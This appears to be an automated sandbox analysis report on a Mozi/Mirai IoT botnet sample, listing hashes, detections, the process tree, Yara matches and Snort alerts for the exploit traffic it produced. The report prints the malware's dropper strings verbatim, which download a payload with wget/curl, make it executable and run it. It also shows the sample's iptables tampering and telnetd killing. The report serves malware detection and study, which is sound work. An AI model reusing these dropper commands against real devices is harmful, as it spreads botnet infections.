Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Analysis Report Mozi.m

Overview

General Information

Sample Name:Mozi.m
Analysis ID:336612
MD5:eec5c6c219535fba3a0492ea8118b397
SHA1:292559e94f1c04b7d0c65d4a01bbbc5dc1ff6f21
SHA256:12013662c71da69de977c04cd7021f13a70cf7bed4ca6c82acbc100464d4b0ef

Detection

Mirai
Score:100
Range:0 - 100
Whitelisted:false

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected Mirai
Yara detected Mirai
Yara detected Mirai
Connects to many ports of the same IP (likely port scanning)
Drops files in suspicious directories
Executes the "iptables" command to insert, remove and/or manipulate rules
Found strings indicative of a multi-platform dropper
Opens /proc/net/* files useful for finding connected devices and routers
Sample reads /proc/mounts (often used for finding a writable filesystem)
Sample tries to persist itself using /etc/profile
Sample tries to persist itself using System V runlevels
Terminates several processes with shell command 'killall'
Uses known network protocols on non-standard ports
Detected TCP or UDP traffic on non-standard ports
Enumerates processes within the "proc" file system
Executes commands using a shell command-line interpreter
Executes the "iptables" command used for managing IP filtering and manipulation
HTTP GET or POST without a user agent
Reads system information from the proc file system
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable
Sample contains strings indicative of password brute-forcing capabilities
Sample contains strings that are potentially command strings
Sample has stripped symbol table
Sample listens on a socket
Sample tries to set the executable flag
Uses the "uname" system call to query kernel version information (possible evasion)
Writes ELF files to disk
Writes HTML files containing JavaScript to disk
Writes shell script files to disk
Yara signature match

Classification

Startup

  • system is lnxubuntu1
  • Mozi.m (PID: 4564, Parent: 4517, MD5: eec5c6c219535fba3a0492ea8118b397) Arguments: /usr/bin/qemu-arm /tmp/Mozi.m
    • Mozi.m New Fork (PID: 4578, Parent: 4564)
      • Mozi.m New Fork (PID: 4580, Parent: 4578)
        • Mozi.m New Fork (PID: 4582, Parent: 4580)
        • sh (PID: 4582, Parent: 4580, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "killall -9 telnetd utelnetd scfgmgr"
          • sh New Fork (PID: 4584, Parent: 4582)
          • killall (PID: 4584, Parent: 4582, MD5: df59c8b62bfcf5b3bd7feaaa2295a9f7) Arguments: killall -9 telnetd utelnetd scfgmgr
        • Mozi.m New Fork (PID: 4601, Parent: 4580)
        • Mozi.m New Fork (PID: 4602, Parent: 4580)
        • Mozi.m New Fork (PID: 4603, Parent: 4580)
          • Mozi.m New Fork (PID: 4616, Parent: 4603)
          • sh (PID: 4616, Parent: 4603, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I INPUT -p tcp --destination-port 56870 -j ACCEPT"
            • sh New Fork (PID: 4618, Parent: 4616)
            • iptables (PID: 4618, Parent: 4616, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I INPUT -p tcp --destination-port 56870 -j ACCEPT
              • iptables New Fork (PID: 4622, Parent: 4618)
              • modprobe (PID: 4622, Parent: 4618, MD5: 3d0e6fb594a9ad9c854ace3e507f86c5) Arguments: /sbin/modprobe ip_tables
          • Mozi.m New Fork (PID: 4650, Parent: 4603)
          • sh (PID: 4650, Parent: 4603, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I OUTPUT -p tcp --source-port 56870 -j ACCEPT"
            • sh New Fork (PID: 4652, Parent: 4650)
            • iptables (PID: 4652, Parent: 4650, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I OUTPUT -p tcp --source-port 56870 -j ACCEPT
          • Mozi.m New Fork (PID: 4653, Parent: 4603)
          • sh (PID: 4653, Parent: 4603, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I PREROUTING -t nat -p tcp --destination-port 56870 -j ACCEPT"
            • sh New Fork (PID: 4655, Parent: 4653)
            • iptables (PID: 4655, Parent: 4653, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I PREROUTING -t nat -p tcp --destination-port 56870 -j ACCEPT
          • Mozi.m New Fork (PID: 4689, Parent: 4603)
          • sh (PID: 4689, Parent: 4603, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I POSTROUTING -t nat -p tcp --source-port 56870 -j ACCEPT"
            • sh New Fork (PID: 4699, Parent: 4689)
            • iptables (PID: 4699, Parent: 4689, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I POSTROUTING -t nat -p tcp --source-port 56870 -j ACCEPT
          • Mozi.m New Fork (PID: 4702, Parent: 4603)
          • sh (PID: 4702, Parent: 4603, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I INPUT -p tcp --dport 56870 -j ACCEPT"
            • sh New Fork (PID: 4708, Parent: 4702)
            • iptables (PID: 4708, Parent: 4702, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I INPUT -p tcp --dport 56870 -j ACCEPT
          • Mozi.m New Fork (PID: 4728, Parent: 4603)
          • sh (PID: 4728, Parent: 4603, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I OUTPUT -p tcp --sport 56870 -j ACCEPT"
            • sh New Fork (PID: 4736, Parent: 4728)
            • iptables (PID: 4736, Parent: 4728, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I OUTPUT -p tcp --sport 56870 -j ACCEPT
          • Mozi.m New Fork (PID: 4739, Parent: 4603)
          • sh (PID: 4739, Parent: 4603, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I PREROUTING -t nat -p tcp --dport 56870 -j ACCEPT"
            • sh New Fork (PID: 4742, Parent: 4739)
            • iptables (PID: 4742, Parent: 4739, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I PREROUTING -t nat -p tcp --dport 56870 -j ACCEPT
          • Mozi.m New Fork (PID: 4750, Parent: 4603)
          • sh (PID: 4750, Parent: 4603, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I POSTROUTING -t nat -p tcp --sport 56870 -j ACCEPT"
            • sh New Fork (PID: 4761, Parent: 4750)
            • iptables (PID: 4761, Parent: 4750, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I POSTROUTING -t nat -p tcp --sport 56870 -j ACCEPT
        • Mozi.m New Fork (PID: 4607, Parent: 4580)
        • Mozi.m New Fork (PID: 4612, Parent: 4580)
        • Mozi.m New Fork (PID: 4614, Parent: 4580)
        • Mozi.m New Fork (PID: 4875, Parent: 4580)
        • sh (PID: 4875, Parent: 4580, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I INPUT -p tcp --destination-port 58000 -j DROP"
          • sh New Fork (PID: 4877, Parent: 4875)
          • iptables (PID: 4877, Parent: 4875, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I INPUT -p tcp --destination-port 58000 -j DROP
        • Mozi.m New Fork (PID: 4878, Parent: 4580)
        • sh (PID: 4878, Parent: 4580, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I OUTPUT -p tcp --source-port 58000 -j DROP"
          • sh New Fork (PID: 4880, Parent: 4878)
          • iptables (PID: 4880, Parent: 4878, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I OUTPUT -p tcp --source-port 58000 -j DROP
        • Mozi.m New Fork (PID: 4881, Parent: 4580)
        • sh (PID: 4881, Parent: 4580, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I INPUT -p tcp --dport 58000 -j DROP"
          • sh New Fork (PID: 4883, Parent: 4881)
          • iptables (PID: 4883, Parent: 4881, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I INPUT -p tcp --dport 58000 -j DROP
        • Mozi.m New Fork (PID: 4885, Parent: 4580)
        • sh (PID: 4885, Parent: 4580, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I OUTPUT -p tcp --sport 58000 -j DROP"
          • sh New Fork (PID: 4892, Parent: 4885)
          • iptables (PID: 4892, Parent: 4885, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I OUTPUT -p tcp --sport 58000 -j DROP
        • Mozi.m New Fork (PID: 4912, Parent: 4580)
        • sh (PID: 4912, Parent: 4580, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "cfgtool set /mnt/jffs2/hw_ctree.xml InternetGatewayDevice.ManagementServer URL \"http://127.0.0.1\""
        • Mozi.m New Fork (PID: 4925, Parent: 4580)
        • sh (PID: 4925, Parent: 4580, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "cfgtool set /mnt/jffs2/hw_ctree.xml InternetGatewayDevice.ManagementServer ConnectionRequestPassword \"acsMozi\""
        • Mozi.m New Fork (PID: 4940, Parent: 4580)
        • sh (PID: 4940, Parent: 4580, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I INPUT -p tcp --destination-port 35000 -j DROP"
          • sh New Fork (PID: 4950, Parent: 4940)
          • iptables (PID: 4950, Parent: 4940, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I INPUT -p tcp --destination-port 35000 -j DROP
        • Mozi.m New Fork (PID: 4975, Parent: 4580)
        • sh (PID: 4975, Parent: 4580, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I INPUT -p tcp --destination-port 50023 -j DROP"
          • sh New Fork (PID: 4985, Parent: 4975)
          • iptables (PID: 4985, Parent: 4975, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I INPUT -p tcp --destination-port 50023 -j DROP
        • Mozi.m New Fork (PID: 5005, Parent: 4580)
        • sh (PID: 5005, Parent: 4580, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I OUTPUT -p tcp --source-port 50023 -j DROP"
          • sh New Fork (PID: 5011, Parent: 5005)
          • iptables (PID: 5011, Parent: 5005, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I OUTPUT -p tcp --source-port 50023 -j DROP
        • Mozi.m New Fork (PID: 5012, Parent: 4580)
        • sh (PID: 5012, Parent: 4580, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I OUTPUT -p tcp --source-port 35000 -j DROP"
          • sh New Fork (PID: 5014, Parent: 5012)
          • iptables (PID: 5014, Parent: 5012, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I OUTPUT -p tcp --source-port 35000 -j DROP
        • Mozi.m New Fork (PID: 5015, Parent: 4580)
        • sh (PID: 5015, Parent: 4580, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I INPUT -p tcp --destination-port 7547 -j DROP"
          • sh New Fork (PID: 5019, Parent: 5015)
          • iptables (PID: 5019, Parent: 5015, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I INPUT -p tcp --destination-port 7547 -j DROP
        • Mozi.m New Fork (PID: 5035, Parent: 4580)
        • sh (PID: 5035, Parent: 4580, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I OUTPUT -p tcp --source-port 7547 -j DROP"
          • sh New Fork (PID: 5044, Parent: 5035)
          • iptables (PID: 5044, Parent: 5035, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I OUTPUT -p tcp --source-port 7547 -j DROP
        • Mozi.m New Fork (PID: 5069, Parent: 4580)
        • sh (PID: 5069, Parent: 4580, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I INPUT -p tcp --dport 35000 -j DROP"
          • sh New Fork (PID: 5079, Parent: 5069)
          • iptables (PID: 5079, Parent: 5069, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I INPUT -p tcp --dport 35000 -j DROP
        • Mozi.m New Fork (PID: 5097, Parent: 4580)
        • sh (PID: 5097, Parent: 4580, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I INPUT -p tcp --dport 50023 -j DROP"
          • sh New Fork (PID: 5105, Parent: 5097)
          • iptables (PID: 5105, Parent: 5097, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I INPUT -p tcp --dport 50023 -j DROP
        • Mozi.m New Fork (PID: 5112, Parent: 4580)
        • sh (PID: 5112, Parent: 4580, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I OUTPUT -p tcp --sport 50023 -j DROP"
          • sh New Fork (PID: 5121, Parent: 5112)
          • iptables (PID: 5121, Parent: 5112, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I OUTPUT -p tcp --sport 50023 -j DROP
        • Mozi.m New Fork (PID: 5139, Parent: 4580)
        • sh (PID: 5139, Parent: 4580, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I OUTPUT -p tcp --sport 35000 -j DROP"
          • sh New Fork (PID: 5144, Parent: 5139)
          • iptables (PID: 5144, Parent: 5139, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I OUTPUT -p tcp --sport 35000 -j DROP
        • Mozi.m New Fork (PID: 5146, Parent: 4580)
        • sh (PID: 5146, Parent: 4580, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I INPUT -p tcp --dport 7547 -j DROP"
          • sh New Fork (PID: 5152, Parent: 5146)
          • iptables (PID: 5152, Parent: 5146, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I INPUT -p tcp --dport 7547 -j DROP
        • Mozi.m New Fork (PID: 5169, Parent: 4580)
        • sh (PID: 5169, Parent: 4580, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I OUTPUT -p tcp --sport 7547 -j DROP"
          • sh New Fork (PID: 5183, Parent: 5169)
          • iptables (PID: 5183, Parent: 5169, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I OUTPUT -p tcp --sport 7547 -j DROP
        • Mozi.m New Fork (PID: 5199, Parent: 4580)
        • sh (PID: 5199, Parent: 4580, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I INPUT -p udp --destination-port 14165 -j ACCEPT"
          • sh New Fork (PID: 5201, Parent: 5199)
          • iptables (PID: 5201, Parent: 5199, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I INPUT -p udp --destination-port 14165 -j ACCEPT
        • Mozi.m New Fork (PID: 5202, Parent: 4580)
        • sh (PID: 5202, Parent: 4580, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I OUTPUT -p udp --source-port 14165 -j ACCEPT"
          • sh New Fork (PID: 5204, Parent: 5202)
          • iptables (PID: 5204, Parent: 5202, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I OUTPUT -p udp --source-port 14165 -j ACCEPT
        • Mozi.m New Fork (PID: 5205, Parent: 4580)
        • sh (PID: 5205, Parent: 4580, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I PREROUTING -t nat -p udp --destination-port 14165 -j ACCEPT"
          • sh New Fork (PID: 5207, Parent: 5205)
          • iptables (PID: 5207, Parent: 5205, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I PREROUTING -t nat -p udp --destination-port 14165 -j ACCEPT
        • Mozi.m New Fork (PID: 5208, Parent: 4580)
        • sh (PID: 5208, Parent: 4580, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I POSTROUTING -t nat -p udp --source-port 14165 -j ACCEPT"
          • sh New Fork (PID: 5211, Parent: 5208)
          • iptables (PID: 5211, Parent: 5208, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I POSTROUTING -t nat -p udp --source-port 14165 -j ACCEPT
        • Mozi.m New Fork (PID: 5220, Parent: 4580)
        • sh (PID: 5220, Parent: 4580, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I INPUT -p udp --dport 14165 -j ACCEPT"
          • sh New Fork (PID: 5232, Parent: 5220)
          • iptables (PID: 5232, Parent: 5220, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I INPUT -p udp --dport 14165 -j ACCEPT
        • Mozi.m New Fork (PID: 5254, Parent: 4580)
        • sh (PID: 5254, Parent: 4580, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I OUTPUT -p udp --sport 14165 -j ACCEPT"
          • sh New Fork (PID: 5268, Parent: 5254)
          • iptables (PID: 5268, Parent: 5254, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I OUTPUT -p udp --sport 14165 -j ACCEPT
        • Mozi.m New Fork (PID: 5290, Parent: 4580)
        • sh (PID: 5290, Parent: 4580, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I PREROUTING -t nat -p udp --dport 14165 -j ACCEPT"
          • sh New Fork (PID: 5303, Parent: 5290)
          • iptables (PID: 5303, Parent: 5290, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I PREROUTING -t nat -p udp --dport 14165 -j ACCEPT
        • Mozi.m New Fork (PID: 5326, Parent: 4580)
        • sh (PID: 5326, Parent: 4580, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I POSTROUTING -t nat -p udp --sport 14165 -j ACCEPT"
          • sh New Fork (PID: 5333, Parent: 5326)
          • iptables (PID: 5333, Parent: 5326, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I POSTROUTING -t nat -p udp --sport 14165 -j ACCEPT
  • upstart New Fork (PID: 4794, Parent: 3310)
  • sh (PID: 4794, Parent: 3310, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -e /proc/self/fd/9
    • sh New Fork (PID: 4795, Parent: 4794)
    • date (PID: 4795, Parent: 4794, MD5: 54903b613f9019bfca9f5d28a4fff34e) Arguments: date
    • sh New Fork (PID: 4796, Parent: 4794)
    • apport-checkreports (PID: 4796, Parent: 4794, MD5: 1a7d84ebc34df04e55ca3723541f48c9) Arguments: /usr/bin/python3 /usr/share/apport/apport-checkreports --system
  • upstart New Fork (PID: 4821, Parent: 3310)
  • sh (PID: 4821, Parent: 3310, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -e /proc/self/fd/9
    • sh New Fork (PID: 4822, Parent: 4821)
    • date (PID: 4822, Parent: 4821, MD5: 54903b613f9019bfca9f5d28a4fff34e) Arguments: date
    • sh New Fork (PID: 4823, Parent: 4821)
    • apport-gtk (PID: 4823, Parent: 4821, MD5: ec58a49a30ef6a29406a204f28cc7d87) Arguments: /usr/bin/python3 /usr/share/apport/apport-gtk
  • upstart New Fork (PID: 4848, Parent: 3310)
  • sh (PID: 4848, Parent: 3310, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -e /proc/self/fd/9
    • sh New Fork (PID: 4849, Parent: 4848)
    • date (PID: 4849, Parent: 4848, MD5: 54903b613f9019bfca9f5d28a4fff34e) Arguments: date
    • sh New Fork (PID: 4866, Parent: 4848)
    • apport-gtk (PID: 4866, Parent: 4848, MD5: ec58a49a30ef6a29406a204f28cc7d87) Arguments: /usr/bin/python3 /usr/share/apport/apport-gtk
  • cleanup

Yara Overview

Initial Sample

SourceRuleDescriptionAuthorStrings
Mozi.mSUSP_XORed_MozillaDetects suspicious XORed keyword - Mozilla/5.0Florian Roth
  • 0x37450:$xo1: oMXKNNC\x0D\x17\x0C\x12
  • 0x374c0:$xo1: oMXKNNC\x0D\x17\x0C\x12
  • 0x37530:$xo1: oMXKNNC\x0D\x17\x0C\x12
  • 0x375a0:$xo1: oMXKNNC\x0D\x17\x0C\x12
  • 0x37610:$xo1: oMXKNNC\x0D\x17\x0C\x12
Mozi.mJoeSecurity_Mirai_8Yara detected MiraiJoe Security
    Mozi.mJoeSecurity_Mirai_9Yara detected MiraiJoe Security
      Mozi.mJoeSecurity_Mirai_4Yara detected MiraiJoe Security

        PCAP (Network Traffic)

        SourceRuleDescriptionAuthorStrings
        dump.pcapJoeSecurity_Mirai_4Yara detected MiraiJoe Security

          Dropped Files

          SourceRuleDescriptionAuthorStrings
          /usr/networksSUSP_XORed_MozillaDetects suspicious XORed keyword - Mozilla/5.0Florian Roth
          • 0x37450:$xo1: oMXKNNC\x0D\x17\x0C\x12
          • 0x374c0:$xo1: oMXKNNC\x0D\x17\x0C\x12
          • 0x37530:$xo1: oMXKNNC\x0D\x17\x0C\x12
          • 0x375a0:$xo1: oMXKNNC\x0D\x17\x0C\x12
          • 0x37610:$xo1: oMXKNNC\x0D\x17\x0C\x12
          /usr/networksJoeSecurity_Mirai_8Yara detected MiraiJoe Security
            /usr/networksJoeSecurity_Mirai_9Yara detected MiraiJoe Security
              /usr/networksJoeSecurity_Mirai_4Yara detected MiraiJoe Security

                Signature Overview

                Click to jump to signature section

                Show All Signature Results

                AV Detection:

                barindex
                Antivirus / Scanner detection for submitted sampleShow sources
                Source: Mozi.mAvira: detected
                Antivirus detection for dropped fileShow sources
                Source: /usr/networksAvira: detection malicious, Label: LINUX/Mirai.lldau
                Multi AV Scanner detection for submitted fileShow sources
                Source: Mozi.mVirustotal: Detection: 70%Perma Link
                Source: Mozi.mReversingLabs: Detection: 68%

                Spreading:

                barindex
                Found strings indicative of a multi-platform dropperShow sources
                Source: Mozi.mString: >/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;rm -rf i;wget http://%s:%d/i ||curl -O http://%s:%d/i ||/bin/busybox wget http://%s:%d/i;chmod 777 i ||(cp /bin/ls ii;cat i>ii &&rm i;cp ii i;rm ii);./i;/bin/busybox echo -e '%s'
                Source: Mozi.mString: >/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;rm -rf i;wget http://%s:%d/bin.sh ||curl -O http://%s:%d/bin.sh ||/bin/busybox wget http://%s:%d/bin.sh;chmod 777 bin.sh ||(cp /bin/ls bix.sh;cat bin.sh>bix.sh;rm bin.sh;cp bix.sh bin.sh;rm bix.sh);sh bin.sh %s;/bin/busybox echo -e '%s'
                Source: Mozi.mString: nvalidailedncorrecteniedoodbyebad$ELFshelldvrdvswelcomesuccessmdm96259615-cdpF6connectedBCM#usernamepass>/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;rm -rf i;wget http://%s:%d/i ||curl -O http://%s:%d/i ||/bin/busybox wget http://%s:%d/i;chmod 777 i ||(cp /bin/ls ii;cat i>ii &&rm i;cp ii i;rm ii);./i;/bin/busybox echo -e '%s'
                Opens /proc/net/* files useful for finding connected devices and routersShow sources
                Source: /tmp/Mozi.m (PID: 4603)Opens: /proc/net/route
                Source: /tmp/Mozi.m (PID: 4603)Opens: /proc/net/route

                Networking:

                barindex
                Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
                Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.20:47982 -> 23.44.146.105:80
                Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.20:47982 -> 23.44.146.105:80
                Source: TrafficSnort IDS: 1200 ATTACK-RESPONSES Invalid URL 23.44.146.105:80 -> 192.168.2.20:47982
                Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 83.163.237.112: -> 192.168.2.20:
                Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 46.165.139.60: -> 192.168.2.20:
                Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 195.229.0.147: -> 192.168.2.20:
                Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 38.104.123.122: -> 192.168.2.20:
                Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 78.54.73.174: -> 192.168.2.20:
                Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 67.187.218.82: -> 192.168.2.20:
                Source: TrafficSnort IDS: 2025576 ET EXPLOIT HackingTrio UA (Hello, World) 192.168.2.20:51592 -> 35.168.169.85:80
                Source: TrafficSnort IDS: 2027063 ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) 192.168.2.20:51592 -> 35.168.169.85:80
                Source: TrafficSnort IDS: 2020899 ET EXPLOIT D-Link Devices Home Network Administration Protocol Command Execution 192.168.2.20:54436 -> 107.170.200.206:80
                Source: TrafficSnort IDS: 2030919 ET TROJAN Mozi Botnet DHT Config Sent 59.99.92.197:32998 -> 192.168.2.20:14165
                Source: TrafficSnort IDS: 2030919 ET TROJAN Mozi Botnet DHT Config Sent 117.202.68.123:8080 -> 192.168.2.20:14165
                Source: TrafficSnort IDS: 2030919 ET TROJAN Mozi Botnet DHT Config Sent 220.77.193.240:5353 -> 192.168.2.20:14165
                Source: TrafficSnort IDS: 2030919 ET TROJAN Mozi Botnet DHT Config Sent 117.215.212.106:18221 -> 192.168.2.20:14165
                Source: TrafficSnort IDS: 2025576 ET EXPLOIT HackingTrio UA (Hello, World) 192.168.2.20:59680 -> 115.15.161.14:8080
                Source: TrafficSnort IDS: 2027063 ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) 192.168.2.20:59680 -> 115.15.161.14:8080
                Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 77.190.174.8: -> 192.168.2.20:
                Source: TrafficSnort IDS: 401 ICMP Destination Unreachable Network Unreachable 81.228.84.35: -> 192.168.2.20:
                Source: TrafficSnort IDS: 2025576 ET EXPLOIT HackingTrio UA (Hello, World) 192.168.2.20:52344 -> 107.154.165.234:80
                Source: TrafficSnort IDS: 2027063 ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) 192.168.2.20:52344 -> 107.154.165.234:80
                Source: TrafficSnort IDS: 2029215 ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound 192.168.2.20:49116 -> 195.154.172.83:80
                Source: TrafficSnort IDS: 2024916 ET EXPLOIT Netgear DGN Remote Command Execution 192.168.2.20:49116 -> 195.154.172.83:80
                Source: TrafficSnort IDS: 2029215 ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound 192.168.2.20:59784 -> 158.199.197.56:80
                Source: TrafficSnort IDS: 2024916 ET EXPLOIT Netgear DGN Remote Command Execution 192.168.2.20:59784 -> 158.199.197.56:80
                Source: TrafficSnort IDS: 2029215 ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound 192.168.2.20:45960 -> 104.97.230.229:80
                Source: TrafficSnort IDS: 2024916 ET EXPLOIT Netgear DGN Remote Command Execution 192.168.2.20:45960 -> 104.97.230.229:80
                Source: TrafficSnort IDS: 1200 ATTACK-RESPONSES Invalid URL 104.97.230.229:80 -> 192.168.2.20:45960
                Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 80.140.241.117: -> 192.168.2.20:
                Source: TrafficSnort IDS: 2025576 ET EXPLOIT HackingTrio UA (Hello, World) 192.168.2.20:52400 -> 66.49.194.21:80
                Source: TrafficSnort IDS: 2027063 ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) 192.168.2.20:52400 -> 66.49.194.21:80
                Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.20:34684 -> 203.146.142.202:80
                Source: TrafficSnort IDS: 2025576 ET EXPLOIT HackingTrio UA (Hello, World) 192.168.2.20:46778 -> 23.243.117.203:8080
                Source: TrafficSnort IDS: 2027063 ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) 192.168.2.20:46778 -> 23.243.117.203:8080
                Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.20:34684 -> 203.146.142.202:80
                Source: TrafficSnort IDS: 2025576 ET EXPLOIT HackingTrio UA (Hello, World) 192.168.2.20:36646 -> 104.238.159.33:80
                Source: TrafficSnort IDS: 2027063 ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) 192.168.2.20:36646 -> 104.238.159.33:80
                Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 46.164.1.124: -> 192.168.2.20:
                Source: TrafficSnort IDS: 486 ICMP Destination Unreachable Communication with Destination Host is Administratively Prohibited 185.181.181.25: -> 192.168.2.20:
                Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.20:48360 -> 54.164.156.191:80
                Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.20:48360 -> 54.164.156.191:80
